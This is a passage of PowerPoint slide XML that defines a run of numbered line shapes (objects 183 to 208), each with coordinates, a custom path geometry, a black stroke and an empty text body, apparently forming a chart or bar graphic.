            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="43848">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="object 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3186420" y="5645702"/>
            <a:ext cx="3775" cy="86826"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="43814">
                <a:moveTo>
                  <a:pt x="1374" y="43448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1374" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="43448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="43724"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="object 184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214326" y="5685425"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="47355">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="object 185"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3213779" y="5636821"/>
            <a:ext cx="1258" cy="95634"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="48260">
                <a:moveTo>
                  <a:pt x="0" y="47929"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="276" y="48205"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="object 186"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3242180" y="5683008"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="49785">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="object 187"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3242179" y="5634483"/>
            <a:ext cx="2517" cy="98151"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="49530">
                <a:moveTo>
                  <a:pt x="828" y="49109"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="828" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="49109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="49385"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="object 188"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3270358" y="5629914"/>
            <a:ext cx="0" cy="103183"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="52069">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="51691"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="object 189"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3268444" y="5632638"/>
            <a:ext cx="2517" cy="100668"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="50800">
                <a:moveTo>
                  <a:pt x="0" y="50040"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="50040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="50316"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="object 190"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3297717" y="5618139"/>
            <a:ext cx="0" cy="114510"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="57785">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="57628"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="object 191"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3297445" y="5615920"/>
            <a:ext cx="1258" cy="117026"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="59055">
                <a:moveTo>
                  <a:pt x="400" y="58477"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400" y="58477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58753"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="object 192"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3325569" y="5611692"/>
            <a:ext cx="0" cy="120801"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="60960">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="60886"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="object 193"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3322830" y="5612732"/>
            <a:ext cx="2517" cy="120801"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="60960">
                <a:moveTo>
                  <a:pt x="0" y="60085"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="60085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="60361"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="object 194"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3353477" y="5601504"/>
            <a:ext cx="0" cy="130868"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="66039">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="66022"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="object 195"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352903" y="5602309"/>
            <a:ext cx="1258" cy="130868"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="66039">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="65621"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="object 196"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3381329" y="5592925"/>
            <a:ext cx="0" cy="139677"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="70485">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="70357"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="object 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3381055" y="5592624"/>
            <a:ext cx="2517" cy="140935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="71119">
                <a:moveTo>
                  <a:pt x="974" y="70232"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="70232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="70508"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="object 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3409234" y="5582199"/>
            <a:ext cx="0" cy="151002"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="76200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="75769"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="object 199"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3407578" y="5581900"/>
            <a:ext cx="2517" cy="151002"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="76200">
                <a:moveTo>
                  <a:pt x="0" y="75644"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="75644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="75921"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="object 200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3437140" y="5587015"/>
            <a:ext cx="0" cy="145968"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="73660">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="73339"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="object 201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3436868" y="5589739"/>
            <a:ext cx="1258" cy="143452"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="72389">
                <a:moveTo>
                  <a:pt x="400" y="71688"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400" y="71688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="71964"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="object 202"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3464447" y="5577922"/>
            <a:ext cx="0" cy="154777"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="78105">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="77923"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="object 203"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3461996" y="5579807"/>
            <a:ext cx="2517" cy="153519"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="77469">
                <a:moveTo>
                  <a:pt x="0" y="76700"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="76700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="76976"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="object 204"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3492353" y="5576290"/>
            <a:ext cx="0" cy="156035"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="78739">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="78751"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="object 205"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3492079" y="5579014"/>
            <a:ext cx="0" cy="153519"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="77469">
                <a:moveTo>
                  <a:pt x="0" y="77100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="77376"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="object 206"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520258" y="5556974"/>
            <a:ext cx="0" cy="176169"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="88900">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="88498"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="object 207"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3519985" y="5558605"/>
            <a:ext cx="2517" cy="174910"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="88264">
                <a:moveTo>
                  <a:pt x="1098" y="87400"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1098" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1098" y="87400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="87676"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="object 208"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3548112" y="5562337"/>
            <a:ext cx="0" cy="171135"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
